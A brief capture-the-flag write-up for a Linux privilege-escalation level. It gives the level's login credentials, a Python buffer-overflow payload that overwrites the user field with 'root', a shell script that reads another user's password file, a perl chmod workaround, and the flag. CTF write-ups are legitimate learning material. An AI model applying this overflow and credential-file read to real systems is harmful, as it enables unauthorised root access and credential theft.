← Back
Level2_Pwnage_Linux_Level_Up | Avishai’s CTF Writeups

Avishai's CTF Writeups

Yalla Balagan! A collection of my CTF writeups and solutions.

View on GitHub

here we need to give username: nobody, password: Ksdkjkk32avsh, and then in the command we can overflow the user and put there root.

command = b'/tmp/my_script.sh'

payload = b'nobody\n'
payload += b'Ksdkjkk32avsh\n'
payload += command + b'\x00' + b'c' * (96 - len(command) - 1)
payload += b'root\x00'

print(payload)

the file I created is my_script.sh, it contains this:

#!/bin/bash
pass=$(cat /home/level3/.pass)
echo "Passowrd is: $pass"

Notice that we can’t use chmod, so i used this: perl -e 'chmod 0755, "my_script.sh"'

image

Flag: b130hOOfGftXUfmRZlgD